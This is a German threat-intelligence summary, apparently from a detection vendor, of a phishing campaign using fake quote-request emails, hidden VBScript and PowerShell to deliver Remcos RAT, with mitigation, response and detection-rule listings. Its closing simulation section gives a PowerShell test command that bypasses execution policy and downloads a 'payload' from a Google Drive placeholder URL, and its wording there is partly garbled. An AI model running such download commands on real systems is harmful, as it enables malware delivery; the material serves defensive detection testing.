Gefälschte Angebotsanfragen per E-Mail in Malware-Phishing-Angriffen genutzt
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure verteilen Phishing-E-Mails, die als Projektangebotanfragen getarnt sind, um bösartige Nutzlasten zu liefern. Die Kampagne verwendet VBScript, um PowerShell-Befehle zu verbergen, die letztendlich eine mehrstufige Nutzlast und Remcos RAT abrufen. Die endgültige Malware unterstützt die Ausführung von Remote-Befehlen, Keylogging und Datenexfiltration von kompromittierten Systemen.
Untersuchung
Das AhnLab Security Intelligence Center (ASEC) identifizierte eine Phishing-Kampagne, bei der komprimierte Archive versteckte VBScripts enthalten. Forscher entdeckten eine Verschleierungsmethode, die notepad.exe missbraucht, um den PowerShell-Exekutablen Namen zu rekonstruieren und auf tokenbasierte String-Substitution für PowerShell-Befehle angewiesen ist. Die mehrstufige Nutzlast nutzt auch COM-Objekte, um eine UAC-Umgehung durchzuführen.
Abschwächung
Benutzer sollten die E-Mail-Domain des Absenders überprüfen und vorsichtig sein, wenn sie unerwartete Anhänge oder Links öffnen. Organisationen sollten E-Mail-Filter konfigurieren, um verdächtige Dateierweiterungen wie .vbs, .exe und .js zu blockieren. Nutzer sollten auch vermeiden, sensible Anmeldeinformationen auf inoffiziellen oder verdächtigen URLs einzugeben, die durch unaufgeforderte E-Mails erhalten wurden.
Antwort
Wenn bösartige Aktivitäten festgestellt werden, überprüfen Sie die Legitimität der ursprünglichen E-Mail und untersuchen Sie verdächtige Dateiaktivitäten innerhalb von %APPDATA%. Überprüfen Sie auf unautorisierte PowerShell-Ausführungen und Indikatoren, die mit Remcos RAT verbunden sind. Isolieren Sie kompromittierte Systeme vom Netzwerk, um zusätzliche C2-Kommunikation, laterale Aktivitäten und potenzielle Datenexfiltration zu verhindern.
Angriffsfluss
Wir aktualisieren diesen Teil noch.
Erkennungen
LOLBAS WScript / CScript (über Prozess-Erstellung)
Mögliche Dateninfiltration / Exfiltration / C2 über Drittdienste / Tools (über dns_query)
Mögliche Dateninfiltration / Exfiltration / C2 über Drittdienste / Tools (über dns)
IOCs (HashMd5) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind
IOCs (SourceIP) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind
IOCs (DestinationIP) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind
Erkennen eines PowerShell-Skripts, das eine Verbindung zum C2-Server herstellt [Windows-Netzwerkverbindung]
Bösartige PowerShell-Ausführung über VBScript-Verschleierung [Windows PowerShell]
Simulation der Ausführung
-
Angriffserzählung & Befehle: Ein Angreifer sendet eine Spearphishing-E-Mail mit einem Link zu einem Dokument. Wenn der Benutzer auf den Link klickt, wird ein versteckter PowerShell-Befehl ausgeführt, der ein bösartiges Skript aus einem Google Drive-Repository zieht. Der Angreifer verwendet den
ParameterParameter -
, um sicherzustellen, dass die Datei direkt heruntergeladen wird, anstatt im Browser angezeigt zu werden. Ziel ist es, eine dateilose Nutzlast im Arbeitsspeicher auszuführen, um sich vor festplattenbasierten Antivirenprogrammen zu verbergen. Der Befehl ist so konstruiert, dass er die spezielle Erkennungsregel auslöst, die auf dieses Download-Muster abzielt.
Regressionstest-Skript: -
# Simulation des PowerShell-Downloads einer Datei von Google Drive über spezifische URL-Muster $targetUrl = „https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J“ Start-Process powershell.exe -ArgumentList „-NoProfile -ExecutionPolicy Bypass -Command `“Write-Host ‚Downloading payload…‘; $data = Invoke-WebRequest -Uri ‚$targetUrl‘;`““
Aufräumbefehle: